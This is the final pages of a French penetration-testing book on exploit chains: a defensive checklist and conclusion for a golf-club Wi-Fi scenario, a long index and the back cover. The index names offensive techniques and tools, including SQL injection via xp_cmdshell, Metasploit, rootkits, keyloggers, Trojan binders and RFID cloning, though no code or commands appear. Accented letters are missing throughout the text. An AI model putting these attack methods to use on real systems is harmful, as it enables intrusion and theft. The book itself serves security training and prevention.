quelques instants auparavant et permet de stocker diffrentes versions dun chier.

Chapitre 8

Panique au club de golf

273

Le systme dexploitation des quipements rseau (routeurs, commutateurs et serveurs) est-il frquemment mis jour avec les derniers correctifs des fabricants ? Cisco, Microsoft, Novell et les autres fabricants de matriel mettent sans cesse jour les systmes dexploitation de leurs quipements. Beaucoup de ces mises jour sont des mises jour de scurit, conues pour renforcer la scurit du rseau. Les organisations ne sont pas toujours jour dans lapplication de ces mises jour, et le risque associ leurs rseaux est plus lev que ce qui est acceptable.
Pirate rel

Un clbre pirate, nomm Adrian Lamo, a pu attaquer diverses entreprises, comme le New York Times et Worldcom. Pour cela, il a exploit des systmes dexploitation Microsoft mal configurs ou non mis jour.

Un antivirus est-il install sur tous les serveurs et PC ? Les virus sont les sources les plus courantes dattaques sur les rseaux et leurs systmes. Les virus peuvent endommager ou dtruire des donnes, copier des informations sensibles et les envoyer lextrieur ou encore faire planter le rseau. Les antivirus sont une partie importante de la scurit dun rseau et devraient tre installs sur tous les serveurs et PC. Lorsquils sont installs, ils doivent tre administrs de manire centralise. Si oui, de quelle marque et quelle version ? Vous devez utiliser la dernire version dun antivirus reconnu comme Symantec (Norton), McAfee, Trend Micro, Computer Associates, AVG ou Kaspersky. Lantivirus scanne-t-il automatiquement tous les chiers ajouts au systme, y compris les courriers lectroniques ? Le scan automatique est la cl de la dtection prcoce et de lradication des virus. Malheureusement, de nombreuses entreprises nutilisent pas de scan automatique mais sappuient sur leurs employs pour quils lancent un scan priodique. Les virus et vers comptent prcisment sur cette dtection tardive pour attaquer les rseaux. quelle frquence les dnitions de virus sont-elles mises jour ? Comme indiqu prcdemment, le monde de la scurit informatique change quotidiennement. Environ dix nouveaux virus mergent chaque jour pour attaquer des systmes innocents. La majorit de ces virus cible Microsoft Windows. Les antivirus incluent une bibliothque de chiers de dnitions utiliss pendant le scan pour identier et dtruire les virus. Si ces chiers ne sont pas mis jour rgulirement, ils prsentent des opportunits dattaque pour les virus les plus rcents.

274

Chanes dexploits

Sagit-il dune procdure manuelle ou automatique ? La plupart des entreprises requirent de leurs employs quils mettent jour leurs antivirus rgulirement. Malheureusement, un tel processus volontaire signie que les dnitions ne sont pas mises jour sufsamment rgulirement pour assurer une protection able. Pour liminer ce problme, les dnitions de virus devraient tre mises jour par le fournisseur de lantivirus au moins une fois par jour. Le rseau utilise-t-il une mthode de communication sans-l pour connecter les PC et les imprimantes ? Si oui, le chiffrement WEP ou WPA2 est-il congur et pleinement oprationnel ? Comme vous lavez vu dans ce scnario, lattaquant a pu craquer le WPA. Ce nest pas le cas de tout le monde, il vaut donc mieux mettre en place un chiffrement. Les technologies sans-l deviennent de plus en plus populaires dans les entreprises. Certaines les utilisent pour connecter un ou des utilisateurs du site principal au serveur/rseau central, pour connecter divers rseaux dans plusieurs btiments voisins ou pour connecter des appareils mobiles au rseau principal. Les rseaux sans-l sont de trs bons outils pour assurer la connectivit mais apportent leur lot de risques de scurit. Par nature, les systmes sans-l diffusent leur signal au minimum sur une porte de 30 100 mtres dans toutes les directions. Si ce signal nest pas protg, il peut tre dtect par nimporte quel ordinateur sansl, comme nous lavons dmontr. Une fois le signal acquis, un attaquant extrieur peut sattacher au rseau de lentreprise et travailler comme un utilisateur lgitime. Les war drivers se promnent dans les parcs dactivit et les quartiers rsidentiels la recherche de signaux rseau. Ils diffusent ensuite une liste de rseaux sans-l que dautres peuvent utiliser ou dont ils peuvent abuser. Pour se protger de cette menace, il faut utiliser un chiffrement WEP ou WPA2. Ceux-ci congurent le rseau de sorte quil naccepte que les ordinateurs qui utilisent un identiant systme et une cl donns, ce qui empche les personnes non autorises daccder au rseau. Bien congurs, le WEP et le WPA2 chiffrent galement les communications. WPA2 a t introduit en 2004 et est signicativement plus sr que le WEP. Il est recommand de mettre en place du WPA2 plutt que du WEP pour assurer le meilleur niveau possible de scurit sans-l.

Existe-t-il un plan de rcupration formel pour les systmes et oprations critiques ? De nombreuses entreprises nont pas de plan de rcupration formel (pas mme un plan simple) pour leurs systmes informatiques. Lorsque la catastrophe a eu lieu (piratage, vandalisme, catastrophe naturelle), il est trop tard pour penser ce qui peut tre fait. Mettez un tel plan en place pour tre prt si une telle catastrophe se produit.

Chapitre 8

Panique au club de golf

275

Si oui, le plan a-t-il t test rcemment ? Certaines entreprises ont un plan de rcupration qui date de plusieurs annes et qui nest plus applicable aux conditions courantes. Ces plans doivent tre tests priodiquement pour sassurer quils sont toujours adquats. Un plan de rcupration aprs catastrophe est un document vivant. Il change constamment et a besoin dun responsable charg de le tenir jour.

Conclusion
Il est facile de voir que, mme si Phnix est un professionnel, il na pas besoin dune expertise avance pour utiliser des outils courants et un peu dingnierie sociale pour trouver des points daccs servant de point dentre un rseau. Il est donc important de dfendre les systmes sur plusieurs lignes et de surveiller les points dentre non srs et de les exclure. Lorsque le rseau dune entreprise est expos via un rseau sans-l, les pirates peuvent compromettre son infrastructure et rendre les investissements dans dautres quipements de scurit inutiles. Une brche de la scurit sans-l affecte la rputation, la proprit intellectuelle et les donnes dune entreprise. Dans lexemple de ce chapitre, elle peut entraner, pour tous les membres du club, un vol didentit et des enchanements dexploits supplmentaires.

Index
Numriques 1st Email Spider 146 2600 17 3G, modem 112 A Abel 261 installer 261 invite de commande 261 Active Directory mesures de prvention 268 audits 269 cache douverture de session 269 chiffrement 269 compte administrateur 269 compteur de rinitialisation de compte 270 dure de verrouilage de compte 269 fgdump 269 journaux 270 LM 269 message davertissement 269 NTLM 269 NTLMv2 269 politique de mots de passe 269 privilges administratifs 269 remplissage des journaux 269 seuil de verrouillage de compte 270 Adresse IP, scanneur 49 Adresse MAC 27 inondation 31 table 27 usurpation 31 ADS 122 AFXRootkit 2005 177 Aircrack-ng 247 AirJack 252 Analyse de paquets 53 Wireshark 53 Angry IP Scanner 49 ani_loadimage_chunksize 171 Antivirus 61, 270, 273 marque 273 mise jour 273 scan automatique 273 Archive auto-extractible 41 ARP empoisonnement 30 poisoning 30 Attaque, tester 81 Authentication plusieurs facteurs 221 RSA Secure-ID 222 SafeWord 222 Auto-extractible, archive 41 B Backtrack 156, 215, 252 Metasploit 170 Badge RFID 106 Base de donnes crer 228 liste 11 nom 10

278

Index

Base64 Decoder 239 Biomtrie 213 bkhive 216 Botnet IRC 100 Bruit dune attaque 27 Bump key Voir Cl de frappe C Cadre intgr 86 rafrachissement 89 taille 89 Cain connexion distante 261 installer Abel 261 invite de commande distante 261 module de craquage 260 sniffer un rseau 260 Cain & Abel 259 Capture de paquets 51 mesure de prvention 62 WinDump 51 Wireshark 69 Carte de crdit assurance 23 enqute sur la base de donnes 10 vol de numros 16 Carte RFID 106 copie 109 lecteur 108 protection 134 scanner 108 Chane dexploits dnition 1 exemple 2 Cheval de Troie 37 enveloppeur 37 viter la dtection 40 lier un excutable 37

mesure de prvention 61 Netcat 39 Chiffrement 136 Cisco PIX 76 Cl 999 Voir Cl de frappe Cl de frappe 210 fabrication 210 principe 210 Commutateur 27 fonctionnement 27 port scuris 62 Compromission de personnel 80 Compte bancaire 23 Core Impact 158 dnition de la cible 161 dmarrage 158 gnration de cl 160 Corruption de personnel, mesure de prvention 99 Courrier lectronique 1st Email Spider 146 anonyme 45 en-tte 44 modier 45 hameonnage 45 HTML 47 ingnierie sociale 184 usurper une adresse 204 coWPAtty 247 dmarrage 257 dictionnaire 257 genpmk 257 genpmk 257 installation 256 utilisation 256 Craigslist 226 Crochetage 210 bump key 210

Index

279

cl de frappe 210 kit de crochetage 210 mesure de prvention 221 pick gun 210 pistolet de crochetage 210 raclage 212 Cryptcat 61 D DDoS 66 Freak88 66 HTTP 76 mesure de prvention 97 ICMP 68 mesure de prvention 97 ping 68 Dchiquetage 220 Dfaage 6, 19 defaultpasswordlist.com 162 del 126 /q 127 Dsassembleur IDA Pro 144 mesure de prvention 187 Dictionnaire 216, 257 Distributed Denial of Service Voir DDoS DNS empoisonnement 163 enregistrement A 166 redirecteur 168 Windows 2003 Server 164 zone 167 Document, dchiquetage 220 Dossier mdical droits des patients 192 modication 192 vol dinformations 193

E EAPOL 254 EDGAR 108 diteur hexadcimal 56 WinHex 56 EFS 136 E-mail Voir Courrier lectronique Empoisonnement ARP 30 DNS 163 Empreinte digitale minutie 215 rcupration 214 En-tte courrier lectronique 44 chier 59 Entreprises partenaires, clauses de scurit 189 Enveloppeur de chevaux de Troie 37 Espionnage industriel 103 cot 103 Ethereal Voir Wireshark Excutable, lier un cheval de Troie 37 F Facebook 237 exploit 237 Fearless Keylogger 175 options denregistrement 176 options du serveur 176 fgdump 264 Fichier ADS 122 en-tte 59 ux de donnes alternatif 122

280

Index

Filtrage rseau dentre et de sortie 98 ingress et egress 98 par trou noir 97 Filtre, antihameonnage 61 Firefox 241 Flux TCP, Wireshark 54 Formulaire web, vrication des saisies 22 Freak88 66 fonctionnement 68 Friend Blaster Pro 232 G Google allintext 141 letype 142 inanchor 142 intext 104, 145 link 141 reconnaissance 141 Google Maps 152 Street View 153 vue satellite 153 GoolagScan 8 GoToMyPC 112, 113 H Hacker Defender 180 conguration 180 hxdef 180 hxdef.ini 180 Hameonnage 29 courrier lectronique 45 ltre 61 ingnierie sociale 47 mesure de prvention 60 site web 44 crer 226

Hexadcimal, diteur Voir diteur hexadcimal HTML cadre intgr 86 iframe 86 rafrachissement 89 redirection 230 source 91 HTTP 7, 21 DDoS 76 en-tte 21 HEAD 8 redirection 230 I ICMP 68 IDA Pro 144 IDS 26, 270 ifcong 113 Iframe Voir Cadre intgr IIS Voir Microsoft IIS Illgalit 1 Ingnierie sociale 78, 149, 195 courrier lectronique 184 usurper une adresse 204 dnition 195 ducation 219 assistance technique 220 courrier lectronique 219 hameonnage 219 logiciel espion 219 messagerie instantane 219 rceptionniste 220 site web 219 tlchargement 219 hameonnage 47 mesure de prvention 135, 187, 218

Index

281

mot de passe 196 noms 197 personnel daccueil 200 piggybacking 195 poubelle 198 rceptionniste 198 spyware 219 tlphone 150, 199 Injection SQL 10 protection 22 Inondation dadresses MAC 31 MACOF 32 intext 104 ipcong 50, 113, 121 IPS 26, 62, 270 IRC botnet 100 rseau de robots 100 iStumbler 248 J John the Ripper 216 K Keylogger Fearless Keylogger 175 mesure de prvention 188 KisMAC-ng 248 Kismet 247, 252 sniffer le rseau 254 Kit de crochetage 210 utilisation 212 Knoppix 113 L Lecteur de cartes RFID 108 Lgalit 1

LM 269 Logiciel espion 219 M MAC adresse 27 ooding 31 inondation 31 spoong 31 table dadresses 27 usurpation 31 MACOF 32 MacStumbler 248 Manipulation Voir Ingnierie sociale MD5 150 Mesures de prvention Active Directory 268 audits 269 cache douverture de session 269 chiffrement 269 compte administrateur 269 compteur de rinitialisation de compte 270 dure de verrouillage de compte 269 fgdump 269 journaux 270 LM 269 message davertissement 269 NTLM 269 NTLMv2 269 politique de mots de passe 269 privilges administratifs 269 remplissage des journaux 269 seuil de verrouillage de compte 270 antivirus 270, 273 marque 273 mise jour 273 scan automatique 273 attaque de systme dexploitation 136

282

Index

attaque par Wi-Fi 188 atteinte la scurit physique 134 authentication 222 plusieurs facteurs 221 RSA Secure-ID 222 SafeWord 222 biomtrie 221 cache didentiants de connexion sur le domaine 221 capture de paquets 62 carte de crdit 23 cheval de Troie 61 collecte dinformations 96 compromission des systmes daccs 134 informatique 221 compte administrateur 221 bancaire 23 utilisateur 221 copie de cartes RFID 134 corruption de personnel 99 crochetage 221 DDoS HTTP 97 ICMP 97 dchiquetage de documents 220 dsassemblage 187 ducation du personnel 219 assistance technique 220 courrier lectronique 219 hameonnage 219 logiciel espion 219 messagerie interne 219 rceptionniste 220 site web 219 spyware 219 tlchargement 219 emplacement dIIS 22 enqute sur site web 21 quipements rseau mises jour 273 scurisation 271

hameonnage 60, 240 outils 241 identiants par dfaut 23 IDS 270, 271 ingnierie sociale 135, 187, 218 injection SQL 22 IPS 270, 271 isolation des serveurs 22 journalisation 272 keylogger 188 liens 239 liste de contrle 270 message davertissement 269 modication de site web 98 mots de passe 221, 272 choix 240 modication 241 Nmap 135 pages en lecture seule 22 pare-feu 271 piggybacking 218, 220 plan de rcupration 274 test 275 politique de mots de passe 269 poubelles 220 procdures stockes inutiles 22 RainbowCrack 272 reconnaissance 187 rseaux sociaux 238 limiter les contacts 240 limiter les informations 240 prol priv 239 utilisation 238 rootkit 188 sauvegardes 272 protection physique 272 restauration 272 sites 272 scan 135 site de dveloppement 21 stratgie de correctifs 222 stratgies daudit 222

Index

283

systme de dtection dintrusion 270, 271 systme de prvention dintrusion 270, 271 tests externes 271 vol de donnes 136 war drivers 274 Wi-Fi 267 authentication de ports 802.1x 267 chiffrement 274 DHCP 267 ESSID 268 ltrage MAC 268 ligne Internet ddie 268 pare-feu 267 passphrase 267 RADIUS 267 sous-rseaux segments 268 VPN 267 war drivers 274 Metasploit 116, 170 ani_loadimage_chunksize 171 exploit charger 116 paramtrer 117 sessions 172 Microsoft IIS 8 congurer 82 emplacement 22 Microsoft Internet Explorer, ltre antihameonnage 61 Microsoft SQL Server 11 Master 11 OSQL 11 sysbjects 15 sysdatabases 11 xp_cmdshell 13 Microsoft Windows Voir Windows Modem 3G 112

Mot de passe bkhive 216 Cain & Abel 259 choix 240 craquer 216 RainbowCrack 263 dictionnaire 216 ingnierie sociale 196 John the Ripper 216 modication 241 par dfaut 162 politique 269 rcuprer sous Windows 216, 264 Samdump2 216 Mozilla Firefox, ltre antihameonnage 61 msplinks 229 dcoder les URL 239 My IP Suite 146 MySpace 224, 229 bulletin 236 crer des amis 230 Friend Blaster Pro 232 ingnierie sociale 234 msplinks dcoder les URL 239 restriction des demandes damis 240 URL, dcoder 239 MySQL, crer une base de donnes 228 N nbtscan 258 net localgroup 117, 179 user 117, 179 Netcat 34 cheval de Troie 39 Cryptcat 61 options 39

284

Index

Netcraft 143 Netcraft Toolbar 241 NetStumbler 248 Nmap 114, 122, 157 dtection de systme dexploitation 157, 115 mesure de prvention 135 option -a 115 -p 115 -P0 157 Nom de domaine enregistrement 226 priv 226 nslookup 198 NTFS ADS 122 ux de donnes alternatif 122 NTLM 269 NTLMv2 269 O OSQL 11 paramtres 12 P Page web, source 91 Paquet analyser 53 capture 51 Phishing Voir Hameonnage Photobucket 233 PHP, serialize 228 Pick gun Voir Pistolet de crochetage

Piggybacking dnition informatique 195 ingnierie sociale 195 exemple 196 mesure de prvention 218 Pistolet de crochetage 210 PIX 76 Point daccs Wi-Fi non autoris 121 Politique de scurit, clauses contractuelles 189 Port scanneur 49 scuris 62 PromiScan 62 R Rainbow Tables 263 gnrer 263 trier 264 RainbowCrack 217, 263 Rainbow Tables 263 gnrer 263 trier 264 rcrack 264 rtgen 263 rtsort 264 rcrack 264 Reconnaissance base de connaissances 105 bureaux et sites 205 courrier lectronique 204 format 204 disposition des locaux 206 forum 105 dassistance 143 fournisseurs 203 Google 141 Google Maps 152

Index

285

Google Street View 153 horaires douverture 201 logiciels 203 mesure de prvention 187 nslookup 198 organigrammes 205 personnel informatique 202 physique 200 planning de congs 204 points dentre 205 poubelle 198 prestataire commercial 203 rpondeur automatique 206 scurit physique 205 sites web 198, 203 SpiderFoot 148 systme dexploitation 203 tlphone 199 telnet 199 Redirection HTTP 230 Rseau sans l, risques 243 Rseau social, risques 238 RFID 106 extraire les donnes 109 lecteur de cartes 108 scanner 108 Rootkit AFXRootkit 2005 177 Hacker Defender 180 mesure de prvention 188 Rootkit Revealer 188 Routeur, mot de passe par dfaut 162 RSA Secure-ID 222 rtgen 263 rtsort 264 S SafeWord 222 Samdump2 216

Sauvegardes 272 protection physique 272 restauration 272 sites 272 Scanner NETBIOS 258 RFID 108 antenne 111 Wi-Fi Aircrack-ng 247 iStumbler 248 KisMAC-ng 248 Kismet 247 MacStumbler 248 NetStumbler 248 WaveStumbler 247 Wellenreiter 247 Scanner biomtrique 214 empreinte 2D 214 3D 215 mesure de prvention 221 ractiver 214 Scanneur adresse IP 49 Angry IP Scanner 49 port 49 Srialisation 228 Serrure biomtrique 213 crochetage 210 cylindrique 212 intrieur 212 standard 480 pne dormant 208 Serveur DNS 164 Serveur web de dveloppement 8 dterminer la version 8 Microsoft IIS 82

286

Index

Site web copier avec Wget 34 de dveloppement 8, 21 de redirection 228 dfacer 6, 19 GoolagScan 8 serveur 8 Somme de contrle MD5 150 Spammimic 17 SpiderFoot 148 Spyware 219 SQL commentaire 11 n de commande 11 injection 10 point-virgule 11 tiret 11 xp_cmdshell 13 SQL Server Voir Microsoft SQL Server Switch Voir Commutateur Syskey 216 Systme dexploitation dtection avec Nmap 115, 157 vulnrabilit, corriger 136 Systme de dtection dintrusion 26, 270 Systme de prvention dintrusion 270 Systme de protection dintrusion 26 T TCP, ux 54 tcpdump 168 Tlphone, ingnierie sociale 150 telnet 199 Test dattaque 81

TFTP 50 syntaxe 51 Tftp32 51 Tftp32 51 Trojan Voir Cheval de Troie Trojan wrapper 37 U Usenet 17 Usurpation dadresse MAC 31 Utilitaire de sauvegarde (Windows) 119 V Virus vbs 130 VMWare 113 void1 252 Vol didentit 193 Vol de donnes, mesure de prvention 136 W War drivers 274 WaveStumbler 247 Wellenreiter 247 WEP, failles 255 Wget 34, 226 Wi-Fi association 253 chiffrement 274 WEP 155 craquage, coWPAtty 247 dialogue en quatre tapes 253 EAPOL 254 ESSID dtecter 252 diffusion 250 mesures de prvention 267

Index

287

attaque 188 authentication de ports 802.1x 267 DHCP 267 ESSID 268 ltrage MAC 268 ligne Internet ddie 268 pare-feu 267 passphrase 267 RADIUS 267 sous-rseaux segments 268 VPN 267 point daccs non autoris 121 risques 243, 274 scanner Aircrack-ng 247 AirJack 252 coWPAtty 247 iStumbler 248 KisMAC-ng 248 Kismet 252 MacStumbler 248 NetStumbler 248 void1 252 WaveStumbler 247 Wellenreiter 247 war drivers 274 WEP 188 failles 255 WPA 188 Windows compte, crer 117 EFS 136 mot de passe bkhive 216 Cain & Abel 259 craquer 216 fgdump 264 John the Ripper 216

rcuprer 216, 264 Samdump2 216 Service Pack 136 Systme Local 117 utilitaire de sauvegarde 119 Windows 2003 Server crer un utilisateur 179 serveur DNS 164 crer une zone 166 enregistrement A 166 redirecteur 168 Windows Scripting Host Worm Constructor 128 WinDump 52 options 52 WinPcap 52 WinHex 56 WinPcap, installer 52 Wireshark 54 capture de paquets 69 EAPOL 254 ltres 70 ux TCP 54 traces WiFi 254 WPA2, coWPAtty 247 X xp_cmdshell 13 Y YAB 37 options 38 Yet Another Binder Voir YAB

Rfrence

Chanes dexploits
Un pirate informatique sappuie rarement sur une unique attaque, mais utilise plutt des chanes dexploits, qui impliquent plusieurs mthodes et attaques coordonnes, pour atteindre sa cible et arriver ses ns. Ces chanes dexploits sont gnralement complexes et difciles prvenir. Or la plupart des ouvrages de scurit ne les couvrent pas, ou sinon de manire supercielle. Ce livre prsente en profondeur les principales chanes dexploits qui svissent actuellement. travers des exemples bass sur des stratgies dattaques relles, utilisant les outils actuels les plus courants et visant des cibles importantes comme des donnes bancaires ou de scurit sociale, vous dcouvrirez le spectre complet des attaques, des rseaux sans l laccs physique en passant par lingnierie sociale. Dans chaque scnario, les exploits sont dcortiqus un un en vue dexpliquer la chane qui va conduire lattaque nale. Les mesures de prvention appliquer pour viter ces attaques vous sont ensuite exposes. Ainsi sensibilis au mode opratoire des hackers et leurs attaques sophistiques, vous aurez toutes les cls pour vous protger le plus efcacement possible.

Scnarios de hacking avanc et prvention


TABLE DES MATIRES

Tent par une carte de crdit gratuite ? Espionner votre chef Faire planter le site web de votre concurrent Espionnage industriel Chane dentreprises Obtenir un accs physique des dossiers mdicaux Attaquer des rseaux sociaux Panique au club de golf

propos des auteurs Andrew Whitaker, directeur du programme InfoSec and Networking Training Camp, est co-auteur de Penetration Testing and Network Defense. Il a reu lInstructor of Excellence Award dEC Council. Keatron Evans est prsident et consultant senior en scurit de Blink Digital Security, LLC, formateur Training Camp et a reu lInstructor of Excellence Award dEC Council. Jack B. Voth est spcialiste des tests dintrusion, de lvaluation des vulnrabilits et de la scurit de primtres. Il est copropritaire de The Client Server, Inc. et formateur pour Training Camp aux tats-Unis comme ltranger.

Scurit
Niveau : Tous niveaux

Pearson Education France 47 bis rue des Vinaigriers 75010 Paris Tl. : 01 72 74 90 00 Fax : 01 42 05 22 17 www.pearson.fr

ISBN : 978-2-7440-4025-2